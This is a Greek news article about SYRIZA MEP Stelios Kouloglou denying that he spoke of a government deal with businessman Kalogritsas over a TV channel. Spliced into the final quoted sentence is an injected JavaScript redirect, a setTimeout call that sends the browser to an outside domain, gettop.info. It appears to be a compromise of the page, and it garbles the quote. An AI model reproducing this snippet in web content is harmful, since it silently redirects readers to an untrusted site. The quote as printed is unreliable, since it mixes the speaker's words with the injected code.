Κούλογλου: Δεν μίλησα για συμφωνία κυβέρνησης – Καλογρίτσα

0
3

 

«Ποτέ δεν είπα ότι η κυβέρνηση είχε συνάψει συμφωνία με τον επιχειρηματία Καλογρίτσα για να τη στηρίζει μέσα από το κανάλι που θα έφτιαχνε», υπογράμμισε με σημερινές του δηλώσεις ο Στέλιος Κούλογλου.

O ευρωβουλευτής του ΣΥΡΙΖΑ σε μια προσπάθεια διευκρίνισης των δηλώσεων που άναψαν «φωτιές» μίλησε στον ΑΝΤ1 και επισήμανε: «είπα ότι η κυβέρνηση προσπάθησε να βάλει κανόνες στο τηλεοπτικό τοπίο και να μαζέψει χρήμα.Προφανώς θα ήθελε να μην είναι όλα τα κανάλια τόσο εχθρικά όσο σχεδόν όλα τα σημερινά κανάλια. Ποτέ δε είπα ότι υπάρχει συμφωνία Κυβέρνησης-Καλογρίτσα ή στελεχών της Κυβέρνησης με τον Καλογρίτσα».

Για να προσθέσει στη συνέχεια «σε αυτό η Κυβέρνηση απέτυχε, αλλά βγήκε κερδισμένη, γιατί το παιχνίδι έγινε με πιο καθαρούς όρους. Εγώ ποτέ δεν μίλησα για συμφωνία, όμως από την στιγμή που ο κ. Καλογρίτσας είχε εκδώσει αριστερή εφημερίδα, είχε σχέση με την Αριστερά, αν επέλεγε το κανάλι του να μην έχει την ίδια τακτική με τα υπόλοιπα, που είναι αντιπολιτευτική, για διάφορους λόγους, προφανώς ένα κανάλι που θα στήριζε την κυβέρνηση, τότε θα κέρδιζε τηλεθεατές».

«Δεν μπορείς να μιλήσεις σοβαρά και να πεις ούτε που κέρδισε και που έχασε η κυβέρνηση στην Ελλάδα» υπερθεμάτισε ο κ. Κούλογλου setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here